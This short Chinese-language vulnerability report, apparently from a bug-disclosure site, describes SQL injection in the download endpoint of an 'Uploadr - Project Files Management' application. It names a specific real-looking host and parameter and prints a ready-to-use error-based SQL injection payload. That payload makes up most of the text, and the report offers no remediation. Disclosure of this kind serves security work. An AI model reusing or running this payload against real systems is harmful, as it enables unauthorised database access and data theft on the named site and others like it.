Uploadr - Project Files Management /download处 存在SQL注入
注入点:
http://download.lagunaproperty.com/download?file=[SQL]
error-based payload:
/download?file=1%' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(md5(233),0x716a767a71,(SELECT (ELT(4943=4943,1))),0x7176716b71,0x78))s), 8446744073709551610, 8446744073709551610))) AND '%'='
测试截图:

此处存在的其他注入类型及payload

暂无评论